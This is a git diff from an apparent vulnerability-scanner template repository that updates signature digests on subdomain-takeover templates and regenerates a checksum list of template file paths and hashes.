a/http/takeovers/tave-takeover.yaml b/http/takeovers/tave-takeover.yaml index b0fec15f8a..779a509634 100644 --- a/http/takeovers/tave-takeover.yaml +++ b/http/takeovers/tave-takeover.yaml @@ -30,5 +30,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 4b0a00483046022100fbf23b46ef8a4aa8d273f247e72f3259c4c32b43ec758e4e3877e7b33ddfc5cd022100cfd9f6c876dc572379c1829ad85feb73bb1e8168b78db98e9d592c5eeb400551:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f567fa227ec1c59ea5e3cd810ff5fa7165cb404dd5c23c4889fd57a9e8d600320220561e1f08ae5f4a8f8ccb587892a42ae224f67044eac30646fb8e25ce86e56cf8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/teamwork-takeover.yaml b/http/takeovers/teamwork-takeover.yaml index d6e50531e4..c74df7c143 100644 --- a/http/takeovers/teamwork-takeover.yaml +++ b/http/takeovers/teamwork-takeover.yaml @@ -28,5 +28,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 4a0a00473045022100d2e1923e8aea236705b052924c0ad3bd51139d068896daf041838ea275eb5f5402206f2a3fda681ca3fb7207264838b9834596500b0db1355c6f410e818fe18d0a98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200c14959578832299911cfd57d60b8d2742088dcd2a6859ee930dca59c18d3d8102201c8783b996d7e0adbe4fb289016896ba02fc9a8b12f0fab47abb54d96a262fb7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/tilda-takeover.yaml b/http/takeovers/tilda-takeover.yaml index bd59df48bd..54171f4cc7 100644 --- a/http/takeovers/tilda-takeover.yaml +++ b/http/takeovers/tilda-takeover.yaml @@ -35,5 +35,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 4b0a00483046022100cf20f7eef7723e0643d0412903381668918ed4e468e71f0715c9bdec5a7688a2022100c7eca7751306592f4fc039c2da9e2ecc1b38f7099420e7ac2bac389bf5845811:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202336fcd9a9f8d6c225058e80a03e5698c9aaff69b30cb55f7db16756da443f59022100a1411c4e1c57bd88cb6850e53bb523bf8c33c19d101c2764b7b2e7572a9548bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/tumblr-takeover.yaml b/http/takeovers/tumblr-takeover.yaml index 2e3e38460c..3cc992be2b 100644 --- a/http/takeovers/tumblr-takeover.yaml +++ b/http/takeovers/tumblr-takeover.yaml @@ -39,5 +39,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 490a0046304402201598cd0a842a4fd108c938690442844d43bf8ee7e343be7192e5bdc8f33f756602207f36b901ac8eb26b5704bb2e5db2669ffefac79385e38b3b838cc2d2eef9ce06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206bf1167a9114d4022f618a63a9308698d869c9fa8e51cbf1214b692f4dcd12a4022073558f02e64b15ed6512e98855a6f1d26b9db6d51091ffe75ae2b39fea7cdc3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/uberflip-takeover.yaml b/http/takeovers/uberflip-takeover.yaml index 7a8261d210..b56fb41612 100644 --- a/http/takeovers/uberflip-takeover.yaml +++ b/http/takeovers/uberflip-takeover.yaml @@ -31,5 +31,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 490a0046304402205cf61bf00b014ac3c3255c63485f0ea5b59b91fd641a81ffc936a90eb42ad2b802205ba4878ce63ae460a30160dca5a73e94cabe8703642765631a1f324e88cda068:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100daf9a1e1c0d06425b0dc3694ebf3bc3765d763ec74894d6108a340b90d9d47360220313466225809ee86d23bde59df5029bdce7aca0d01c64439a428875bd494972a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/uptime-takeover.yaml b/http/takeovers/uptime-takeover.yaml index 65a4d0f8a7..5da9d5b1bc 100644 --- a/http/takeovers/uptime-takeover.yaml +++ b/http/takeovers/uptime-takeover.yaml @@ -34,5 +34,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 4a0a0047304502210085a0ff88eac411c553fefc9111615b5fce5421ae019fb6dfb33e3bbf3bbdb1900220273c69814eb607b21b37aafc4a857b565437c0e3941118da9b80a636280a56a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206ae2e4db61257dc700fe2d71b47dfbe0f242e7a9531703ebe3faad83112f25fa02204de1723eed20893ec58a00cb7f0cd7caa2ba0c32cb0fdd897f98626fd8a39677:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/uptimerobot-takeover.yaml b/http/takeovers/uptimerobot-takeover.yaml index 7a8bed71a3..2ddc829e70 100644 --- a/http/takeovers/uptimerobot-takeover.yaml +++ b/http/takeovers/uptimerobot-takeover.yaml @@ -41,5 +41,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 4a0a004730450220721196f64418a6eb526f619f162fcd1fbab5d2b0fe31bf1384cce7b528c31c88022100dac350b5f6b730091041f3aabe46735bed8e0b78fce6a268e96bc59e1f00a7c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220107442093374d13645d0fc634dbd22e0f935034d353c5e008af1f425915be41e0220425e7e0dc419aa3b41478ad23144a355d6a91a2b2e2b57ff14075160cef6f917:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/uservoice-takeover.yaml b/http/takeovers/uservoice-takeover.yaml index 84ea090e7d..35f49ef2fe 100644 --- a/http/takeovers/uservoice-takeover.yaml +++ b/http/takeovers/uservoice-takeover.yaml @@ -31,5 +31,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 4a0a00473045022100aa09c8b6fdbe7b84793de16fcfbc2b1f9b47a5bec7c8562618c6dffe1699ac2f02204354322492f299f876e5674a252217ed8f985d04f027e894e302e548ecbd0522:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022078cb1c9e43356b1552b148b33bf5f893b30896bd5abe83163c7309be3645b321022100ab778902fad53051087acce72732788a6769482f444d888820afd1b18fc1d4d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/vend-takeover.yaml b/http/takeovers/vend-takeover.yaml index c831d2ec84..8ad96acd38 100644 --- a/http/takeovers/vend-takeover.yaml +++ b/http/takeovers/vend-takeover.yaml @@ -30,5 +30,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 4a0a00473045022005cad28da3999701b4d14ebc07e85adaf1faaf878a328e581d9661bffe34864d022100d7baee7ef3c9c736ad4ca5e8946d4861a2df3d9d9e81a2e5f9823acb058564c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022022b0dbe1f5b60787a47074d6cae789b61b13c818f2ca63ce171a19619234fad902205964e2fbce1403f6666f39493673d3a872b6ba0b754e33dde78521d860fbd95d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/wishpond-takeover.yaml b/http/takeovers/wishpond-takeover.yaml index 18b4a721ad..6656d8b3fb 100644 --- a/http/takeovers/wishpond-takeover.yaml +++ b/http/takeovers/wishpond-takeover.yaml @@ -32,5 +32,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 4a0a0047304502207293f11f5db62b0ad65eb3f64c1c7eeef99b286a8f5a309a3ccea7c41d6f2a9c0221009daf8076c7f2cd449d216cd809d1906295d848581b43e5a800374a8c10c98e07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210083675b02f7c8e221e2d34f7d84d811f5e4fc33bd8efd54d643bf93e50eab8c8e022100814989f73d6a81f313d461120e8267717dea9e516ee28e9489f067bb462d7f95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/wix-takeover.yaml b/http/takeovers/wix-takeover.yaml index 9c854dbb73..cdac6dd3af 100644 --- a/http/takeovers/wix-takeover.yaml +++ b/http/takeovers/wix-takeover.yaml @@ -36,5 +36,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 4a0a00473045022064e66b00c42664cbb39163c2885d293e24428ccf16cd22c4b474e0ab00dbe36e0221009744fe99f306cb4dd01d034c28b7dbdf162cc8818f3f761d729eef8b13473f36:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100a0cd6884c061b436ce7561a8d58fd8854b9c2c170c58015efba8998235279be902210095a56be16d9ddb30e7ff4524c444d5337b8952e5dc963380d83bb061d9091a7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/wordpress-takeover.yaml b/http/takeovers/wordpress-takeover.yaml index a3930f9ff1..a313613c73 100644 --- a/http/takeovers/wordpress-takeover.yaml +++ b/http/takeovers/wordpress-takeover.yaml @@ -38,5 +38,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 490a00463044022010ac85e82235d21220b2b93292c2f1b6f510fc2b7d63a0098c379ca79088791e02203e378ce297ff06b4e72664846fbf2b9f7220502a83f76249b0cf4b12e2fda6ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200e210350415af8d696a974aad4b7afad97e09eb49b626d286ba49bfc002c57d102202c34a0126212979cb71c47da6b0a283c71c61f4aba18f41b8bdbec5b70c10328:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/worksites-takeover.yaml b/http/takeovers/worksites-takeover.yaml index eb5ac78e5f..be82d9c7a9 100644 --- a/http/takeovers/worksites-takeover.yaml +++ b/http/takeovers/worksites-takeover.yaml @@ -48,5 +48,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 490a004630440220250de7667d4b6a40352ae56620035450b47c67b9e108538e5fcbe16e24a2aac40220080aae3c7a8d7bf802e14e117926b51d163414b8113ddd517384a44dcd3d1e32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022015e2656c9f329d20fd4891ffcb9834632dac58c492aa84ac9c1666ee62136621022100a36e344c48be6ee62f9f857801310f73f405cd9b5df22503a00171ea141b17c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/wufoo-takeover.yaml b/http/takeovers/wufoo-takeover.yaml index 2d098767a6..1f12919f02 100644 --- a/http/takeovers/wufoo-takeover.yaml +++ b/http/takeovers/wufoo-takeover.yaml @@ -32,5 +32,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 4a0a0047304502200dff4aa3d7f58de4968936c13afe0b66f0c5b6db0de718289013749c1977474b022100b8dc277a832e656b48899f3e87f28f820b2e151f4a67988392fddaaf286da17c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201d2109545256fa0c6655011f8c2109fa145b39721cb7fd66b54240071e31dbed022100fb299c8eeb837c84fbb26d69c8c805d8add5b67d09e6a7b8a9ca73dd7cd77233:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/zendesk-takeover.yaml b/http/takeovers/zendesk-takeover.yaml index 4a29a339c1..24ce00c0a5 100644 --- a/http/takeovers/zendesk-takeover.yaml +++ b/http/takeovers/zendesk-takeover.yaml @@ -34,5 +34,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 4a0a0047304502207f13a85b5f36efa57d0417babbb39d81e6573465eb6125f2ea3f06bdedfd3b7702210082fd4d63db637fc0ce9dd06c534393dfdd113a06b4b1408dcb348d941ead9c2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a3eb6a6435a19adedbce449af23b505508d27a492504f2b6de496d0ea53d2dec022100ea6e2f16a078c3406b623e4c67bd1ee41c4273bef10fe48f8fee50f5cc35822a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From ebc572c5ba5164ef4ec5326f41513082df312a55 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 10 Jul 2024 12:43:47 +0000 Subject: [PATCH 1080/1841] Auto Generated Templates Checksum [Wed Jul 10 12:43:47 UTC 2024] :robot: --- templates-checksum.txt | 236 ++++++++++++++++++++--------------------- 1 file changed, 118 insertions(+), 118 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 443ac2312b..11d6e639ee 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -6786,78 +6786,78 @@ http/osint/user-enumeration/zillow.yaml:6310312dfbeca22632a8b56feaf02d6a8d63c2a5 http/osint/user-enumeration/zmarsacom.yaml:ffb6dde4769b58aed12e36b600faa66348c2f3a0 http/osint/user-enumeration/zomato.yaml:611325521c42aab8a0117b819dcecb3aae9d8df4 http/osint/user-enumeration/zoomitir.yaml:deb452a0a5dd3bbfad1feadbacc72e7c97ba832f -http/takeovers/aftership-takeover.yaml:18bbb4a8a19ade38889a80e4e85dedd1cffb7981 -http/takeovers/agilecrm-takeover.yaml:7b696d0253f2956a33e2805ec62de7862502e1c2 -http/takeovers/aha-takeover.yaml:847bc94aa153a32ead20ae21536deab150d99394 -http/takeovers/airee-takeover.yaml:25ea0e4beb9757ca5f56e52eca47b2047866c223 -http/takeovers/anima-takeover.yaml:aee6e870c420836495f4b81d09179b2da2178f96 -http/takeovers/announcekit-takeover.yaml:439e5820f57ed46947475040e95096a7480e945a -http/takeovers/aws-bucket-takeover.yaml:0f82823a5b2616fc607deee37e30329be92cf9fc -http/takeovers/bigcartel-takeover.yaml:a8e849eadef6b8b091ea8d91ea3c85c24c0032eb -http/takeovers/bitbucket-takeover.yaml:34523edb4c5da6a38883840057a6fbb9409a8f1e -http/takeovers/campaignmonitor-takeover.yaml:b9f3ac20ad2ea96295badf483515c1fbc0d40737 -http/takeovers/canny-takeover.yaml:bf96d603d133f870e3707a262204fa27de2c8648 -http/takeovers/cargo-takeover.yaml:8ca9c47c8b4b2615a331f12f9ebd43c3d4d7d822 -http/takeovers/cargocollective-takeover.yaml:2705684459aaa559c3bb885e68248c987d81123e -http/takeovers/clever-takeover.yaml:39d09eba6d91b59ebe8c1f81690a85d78afd51db -http/takeovers/flexbe-takeover.yaml:a11eda9805b642fc724d37237663dbf7e94aeace -http/takeovers/frontify-takeover.yaml:17b4f0104104def81180a9735f49d3c33713e17f -http/takeovers/gemfury-takeover.yaml:0c9298233ad211aa0d0af13998e53a7ae122ec53 -http/takeovers/getresponse-takeover.yaml:638c9eafb8ae736cfa4298a70dee6beb69b6606b -http/takeovers/ghost-takeover.yaml:d499de473c0e8896939071a959c618bd2026ad1b -http/takeovers/gitbook-takeover.yaml:8499605e997f66ccdb8e81d0ea0f42da04ef3bd3 -http/takeovers/github-takeover.yaml:b23119f8c75503f7c05262e32f0daea6eb644614 -http/takeovers/gohire-takeover.yaml:089a859b3a8a8fdc76af29163a26075ded11c277 -http/takeovers/hatenablog-takeover.yaml:2448390b211a7b0bf38ca7fd665af9084ec623b1 -http/takeovers/helpdocs-takeover.yaml:420da02fa5d9f152087462b2685f40d04cba4369 -http/takeovers/helpjuice-takeover.yaml:32ec75d23c8baa78f37769c878f426a795d90ab1 -http/takeovers/helprace-takeover.yaml:5f688537349cf503850bd296139a163f84a51d95 -http/takeovers/helpscout-takeover.yaml:8ce400e5d2935714c6b139a57e73db3812f81694 -http/takeovers/hubspot-takeover.yaml:b23fc0acb77e56c54018c58c6add2521d208a74e -http/takeovers/intercom-takeover.yaml:78d6b832330ef949607e3aedb5078a2363f3d4ba -http/takeovers/jazzhr-takeover.yaml:63d6036b4f3f7d711cf618f732c456ec8c2d6b89 -http/takeovers/jetbrains-takeover.yaml:8509e9c0c25f84bd48a7979c348c743bf41824b4 -http/takeovers/kinsta-takeover.yaml:0fdbc22ed592a124c0b71095b9c89093646c8010 -http/takeovers/launchrock-takeover.yaml:81c11c1a1ff1f9791187d25f633bbccf025c7631 -http/takeovers/leadpages-takeover.yaml:8fc7c46511356656bd93ffe249907002ae3cd4fc -http/takeovers/lemlist-takeover.yaml:2e42cd27d93248cc465b7aa0f9a30f5bb50c7f32 -http/takeovers/mashery-takeover.yaml:51a3811214f2ba2cf45c93e120004c8d6a10e646 -http/takeovers/meteor-takeover.yaml:5c3a00de754e807d5241280d187956b8f73b7c1e -http/takeovers/netlify-takeover.yaml:bc2a1b46ffa243be876266839314bd715de54ed4 -http/takeovers/ngrok-takeover.yaml:c85f6d434f8be5716b54101629b1749a1110e9ef -http/takeovers/pagewiz-takeover.yaml:9f5eca0e7b3ae8569c89af23db961ddef4ed3fa0 -http/takeovers/pantheon-takeover.yaml:d8cc7dcef539833539bdf994c9eb2329250cca42 -http/takeovers/pingdom-takeover.yaml:697078a14e7796a29b1ea0350891a886495a1c69 -http/takeovers/proposify-takeover.yaml:6978b8f0c654f281b0a116e0bec31c450d6801bc -http/takeovers/readme-takeover.yaml:f7bda555001bee1d376823864fd0859e05a32ea1 -http/takeovers/readthedocs-takeover.yaml:28e0c7d1b5264e08968f0954891c956644735a8d -http/takeovers/shopify-takeover.yaml:50edd9a6ee5826ca651f492e2bba132c1c52ae77 -http/takeovers/short-io.yaml:3f2433232632f3977d5d1c5b7f651973fd060b82 -http/takeovers/simplebooklet-takeover.yaml:0301493f16dce2d5eae687bbd1e92e2b0c715717 -http/takeovers/smartjob-takeover.yaml:8784887b13bcd959bf784caa5f435fbff6af3098 -http/takeovers/smugmug-takeover.yaml:5e690c5245f289daeae914e577682ef0f6866d32 -http/takeovers/softr-takeover.yaml:75cfadd52aa3d8f6a8f3328a4e9cad40c024165e -http/takeovers/sprintful-takeover.yaml:2ea600bcb47240966472dbc8242eee499680b8b3 -http/takeovers/squadcast-takeover.yaml:2e940a3f2ca46efee96d05272435a67c42aac2ed -http/takeovers/strikingly-takeover.yaml:f1614b7491273af8e941848f87c00915397f3320 -http/takeovers/surge-takeover.yaml:c92b580a30914c2f5432bf17044b530ce6f24473 -http/takeovers/surveygizmo-takeover.yaml:26b9f81c809a1858fe4034626fb67add4cb45e9a -http/takeovers/surveysparrow-takeover.yaml:0cdea1f83581902aba550bd1f7a4798e3e5fa7a8 -http/takeovers/tave-takeover.yaml:82e62c1d3e7dc89e41ff11fa903d80617b79f554 -http/takeovers/teamwork-takeover.yaml:144b132c53d05ab11e3a2614a59794b0d3fb6356 -http/takeovers/tilda-takeover.yaml:8c8e087e91fa9c3c03311720bb44910e27b22623 -http/takeovers/tumblr-takeover.yaml:1362cc1ddae926f9f80ec20f2f28b40e3459c00b -http/takeovers/uberflip-takeover.yaml:d77430c408c41acdfcf3b942a8492a0babaf299a -http/takeovers/uptime-takeover.yaml:ab5bc3086d43d8712d095dfd2de63c0b600f3c47 -http/takeovers/uptimerobot-takeover.yaml:9b7894f369ed3c9ea4acd5bdd97530683c54c100 -http/takeovers/uservoice-takeover.yaml:35d9de894391b44dfc90d8a46694058b43f6ff38 -http/takeovers/vend-takeover.yaml:04077899155778179cd21aec6d51688c32236a7c -http/takeovers/wishpond-takeover.yaml:67c35ee94b33bea3f287b86d0822459e8dcc54de -http/takeovers/wix-takeover.yaml:4deceb9a91edde4ac2b86edbd6d63817736137d2 -http/takeovers/wordpress-takeover.yaml:730fa5ffedcbd4902a04dc6e7799c620217391dc -http/takeovers/worksites-takeover.yaml:422aacc7cf30d8c8470bd5ca42f6fb5fc188284d -http/takeovers/wufoo-takeover.yaml:97c4d4f156c348f61eed297bbf7af16189627895 -http/takeovers/zendesk-takeover.yaml:b699e11af4cc9a51a9fcc99c38e13165f9a6c41a +http/takeovers/aftership-takeover.yaml:05139dc9b684651e5818a5524edc14c461e30716 +http/takeovers/agilecrm-takeover.yaml:cee0e85eee5f107be69af56c2058e2a8d8f9ba2f +http/takeovers/aha-takeover.yaml:b4e39901da788731f30c59f3ec709d988d602909 +http/takeovers/airee-takeover.yaml:02aee314894161e2a9a388b6673b5d1b82203e2e +http/takeovers/anima-takeover.yaml:5ea19c04bc236de696bf244ec347269486faf621 +http/takeovers/announcekit-takeover.yaml:dd7ce66bbc73813ebcb863127294eff490fca763 +http/takeovers/aws-bucket-takeover.yaml:770a292dd17881dfae48ae42c559224087da1a51 +http/takeovers/bigcartel-takeover.yaml:d2b5b44c136c422222bb48d50964786d42e759c0 +http/takeovers/bitbucket-takeover.yaml:c35652a5a717dd1ab6ac3d9dda2359baad7b2984 +http/takeovers/campaignmonitor-takeover.yaml:a0a0ff2ddec8703a4524f21440070944ac683064 +http/takeovers/canny-takeover.yaml:20f6dccf41271ed119c333de3487752c38f39c07 +http/takeovers/cargo-takeover.yaml:4d8573eb5fa8c8da2694a575e08d9660178da6f8 +http/takeovers/cargocollective-takeover.yaml:cb012913be6827e9637522b9b49b4de33378d2b8 +http/takeovers/clever-takeover.yaml:349738761d13fc8eebb1d08065afcd91db1a463a +http/takeovers/flexbe-takeover.yaml:617163c63ffb59ec2f94d4d5fd7995f27b261f1a +http/takeovers/frontify-takeover.yaml:8e7b5944d4ea9cd2bfe1c0a53c3f4afb8cd1c5e1 +http/takeovers/gemfury-takeover.yaml:99b2b5e97eb4d80e85058d39901e90611ba65fef +http/takeovers/getresponse-takeover.yaml:3a585afe9dd14bb01f7a50f731c88bc14e2e45db +http/takeovers/ghost-takeover.yaml:58f195a61e50b65af5dcd5450a72b997c792c5ab +http/takeovers/gitbook-takeover.yaml:92f9bbccaed9efd292242faf2c71df9c3eafb2dc +http/takeovers/github-takeover.yaml:386272c1ca1c25f4611d5bce83ea3655b7a40273 +http/takeovers/gohire-takeover.yaml:b2142614c80428b9e20d4d1f7c578f37bac2569f +http/takeovers/hatenablog-takeover.yaml:b4779c3a0fbafcb74b61768a6477648e4cf7cc5e +http/takeovers/helpdocs-takeover.yaml:44ceceb714418c55e679f095ae3ddef393914708 +http/takeovers/helpjuice-takeover.yaml:c6d8566abe761cff3ec6e722fa2bf980592b0b13 +http/takeovers/helprace-takeover.yaml:b51bc278ef232e247a5eb24bbe064c1a0d15523c +http/takeovers/helpscout-takeover.yaml:17a99cf7d0dc9847c71dacfb2ab5535fed3758c2 +http/takeovers/hubspot-takeover.yaml:4d3fbf5e3e0532e6110b9f123d8e9ed090c443a2 +http/takeovers/intercom-takeover.yaml:298429562781185cd36e9935edcbf6cd937ef8d2 +http/takeovers/jazzhr-takeover.yaml:3add0ef377bc3ca2005fa84194711d3cbd51ee93 +http/takeovers/jetbrains-takeover.yaml:fbc0b5793b40a7be5d4346931640783044976d2a +http/takeovers/kinsta-takeover.yaml:2087e379b14a4035aca1a6ad89f473e12849e4ee +http/takeovers/launchrock-takeover.yaml:c16beaffeca68dc6c36475b27ea849a28998642b +http/takeovers/leadpages-takeover.yaml:ddb2bfa0a09ceb5e5f2d26674398873bcc4c6d4f +http/takeovers/lemlist-takeover.yaml:66c930c72d2e07d24a99c333bf96e35bc1b23c5f +http/takeovers/mashery-takeover.yaml:6ff5f87eb2c1f049158d4849b0238cde86ef753e +http/takeovers/meteor-takeover.yaml:c6660758719064b8f230a28174e584f14ee7619d +http/takeovers/netlify-takeover.yaml:69670380a3150b4ce79b125dd7ff6881161e2daf +http/takeovers/ngrok-takeover.yaml:b847bdd5f77acac2a99ca1120d760e606bccfc1b +http/takeovers/pagewiz-takeover.yaml:db60f97af153fa8a25462814bd19e35ad8f3e15b +http/takeovers/pantheon-takeover.yaml:4bd1ea0ffc473c9fab9bf3cd3ab569d2bbc7489a +http/takeovers/pingdom-takeover.yaml:7276d288254b419d4ab756b05b817c66c33c8ffa +http/takeovers/proposify-takeover.yaml:b33442a7a79511b8256806ef999a0119262da0a7 +http/takeovers/readme-takeover.yaml:3c08478b730675af14bf326cd62bbe7fa7c1b911 +http/takeovers/readthedocs-takeover.yaml:f91df3e74e341599bbc435760834facbc8d95f09 +http/takeovers/shopify-takeover.yaml:0e867ab07e477758343ceff7f395fc960130e1aa +http/takeovers/short-io.yaml:2e83fa0332ba0b0f9a7082fb80da1a4989717308 +http/takeovers/simplebooklet-takeover.yaml:6df5f6aed5b371fc8b59f45f24d78fe9a43dcb9e +http/takeovers/smartjob-takeover.yaml:25a7060d297779ca355feaff65a6c4433a4199b3 +http/takeovers/smugmug-takeover.yaml:a5eb25768684535dc3bb4504f1b11d14f91a4d82 +http/takeovers/softr-takeover.yaml:e7f25a55f68cdc1ba2aaaa9201dd199e2f1fd681 +http/takeovers/sprintful-takeover.yaml:05a17fba19add15d709f69ceef290056af224d70 +http/takeovers/squadcast-takeover.yaml:8a014335f429a0fc21fe0fef6c4236f38ee13db7 +http/takeovers/strikingly-takeover.yaml:eb2d72f5f06ec55aebf185c9a73e6818c5d5d1d6 +http/takeovers/surge-takeover.yaml:0f196cce4a0b58d406064ebab4e4eb3927c6fdf2 +http/takeovers/surveygizmo-takeover.yaml:f57ba472abf501f584b8b5a1b20234af4420cc21 +http/takeovers/surveysparrow-takeover.yaml:a08cfc93ec981499465e00d64c8c2ad3249b21bf +http/takeovers/tave-takeover.yaml:05a30fc25c7cb2d3dea1da719cf8a08c7da59607 +http/takeovers/teamwork-takeover.yaml:3394fade18e7adeb195e62dd17bd97c2dc2f906d +http/takeovers/tilda-takeover.yaml:9f3021d59f553b2e03cb870e1de49050f9ac207e +http/takeovers/tumblr-takeover.yaml:56f2202007c5546719fe26272c49d5f9fe0fad6e +http/takeovers/uberflip-takeover.yaml:bcc75315895da7bef8640edaf53e34e563ce3ef7 +http/takeovers/uptime-takeover.yaml:9e0e782f54639b4661c0c7c3ca9abe745a4ed550 +http/takeovers/uptimerobot-takeover.yaml:a58648bd0a4b16b1c491ef661010f5e1fc70f838 +http/takeovers/uservoice-takeover.yaml:be4762a9164ea4cff35f2db0ff055f46329acd17 +http/takeovers/vend-takeover.yaml:59dc9446df5bd7009ea8438dc568d427304fad32 +http/takeovers/wishpond-takeover.yaml:92a7b4f4986a6fb8d2809579c39dbc819d94696f +http/takeovers/wix-takeover.yaml:93579bd0c277ad2ac3ae8f8738bd810202efe5a6 +http/takeovers/wordpress-takeover.yaml:10f886de9667842e25b68b2880d708117d065b34 +http/takeovers/worksites-takeover.yaml:cb3f82773587d4d51c05e5e7c3a2295ef6e174c1 +http/takeovers/wufoo-takeover.yaml:d9b63bad4dad6b3c257fa974b7fa52a876a3ddd4 +http/takeovers/zendesk-takeover.yaml:28ad866ebe48bcbba85d4504dc4cc96b3db65bc7 http/technologies/4D-detect.yaml:4b948a54eb2718980daa15d0ce2aaf5ee1bf843b http/technologies/abyss-web-server.yaml:2fffb4cde6c7f55d76d6e75695407b177e97455f http/technologies/acontent-detect.yaml:3a895300f93df22d858994bf6851a82f9d38c7d9 @@ -8621,67 +8621,67 @@ http/vulnerabilities/zyxel/unauth-ztp-ping.yaml:fe9fe6bf3d7f27b2f5297126714f53c3 http/vulnerabilities/zzzcms/zzzcms-info-disclosure.yaml:daa2040c8238fbe51311e7ac80eca48e3eb64691 http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml:80348e0fda22d428224a9a62afae01b8380694a0 http/vulnerabilities/zzzcms/zzzcms-xss.yaml:61a6fd65556054e8e2a631080388aff7aed42f6b -javascript/audit/mysql/mysql-load-file.yaml:d61333fa25344c2c59bbc1b18b5907a83ea48441 -javascript/backdoor/proftpd-backdoor.yaml:1a18f91b0e969fc037f85f8752667b10c346e699 -javascript/cves/2012/CVE-2012-2122.yaml:762f6ce4585565fd8c55395b2e1245311c86484f -javascript/cves/2016/CVE-2016-8706.yaml:2b62e791d6879ee11d4c9894198c31e6af8c2e05 -javascript/cves/2019/CVE-2019-9193.yaml:8e19e0120e72600f5bb1accfe07d64e3006ae344 -javascript/cves/2020/CVE-2020-7247.yaml:0082ca7fbab144ccd086ced48493ac2fa9a91db4 +javascript/audit/mysql/mysql-load-file.yaml:69a6c8b510723ee3dd91fa9fbc15bc8c49c82d96 +javascript/backdoor/proftpd-backdoor.yaml:a01f25000d3f484d8969dfda5973250096076c4f +javascript/cves/2012/CVE-2012-2122.yaml:73dcc56ec0cdddd72d861002cf190a82eb7905a1 +javascript/cves/2016/CVE-2016-8706.yaml:f1389da5abd6b1351b43f9ac3f5bcaa46d098084 +javascript/cves/2019/CVE-2019-9193.yaml:19b707e4fb0a6f20584109de82e07d15969c4db7 +javascript/cves/2020/CVE-2020-7247.yaml:75a602d700d9ff17184c223b663fc31fa68725a2 javascript/cves/2023/CVE-2023-34039.yaml:44c16d645d9008bce58aaff587f1c1780464946c -javascript/cves/2023/CVE-2023-46604.yaml:88cadcbaba8577e90391af831234f4c87634e745 -javascript/cves/2023/CVE-2023-48795.yaml:e3680353e6ba76bc570008de8f2c1569c27821d2 -javascript/cves/2024/CVE-2024-23897.yaml:7f637d00169eab3cdcff7518500a7c40fc191792 +javascript/cves/2023/CVE-2023-46604.yaml:5595de1d175eda6efbb7f0af3db7c0d16495b5e6 +javascript/cves/2023/CVE-2023-48795.yaml:a52e039bc67f590f9f47bc809565b83b8084df1a +javascript/cves/2024/CVE-2024-23897.yaml:db0b2471d9a6c5b7fcadc252d32db86c17bc9f08 javascript/default-logins/mssql-default-logins.yaml:b95502ea9632648bc430c61995e3d80d0c46f161 javascript/default-logins/postgres-default-logins.yaml:0b960d1c695d009536b0846c5a393731d3fac7ad -javascript/default-logins/redis-default-logins.yaml:d81dbf8d82b9e8b1710c697211d45c2231710ad7 +javascript/default-logins/redis-default-logins.yaml:45255a761f5c94df1b8afe8506bc9b9f5b623ca2 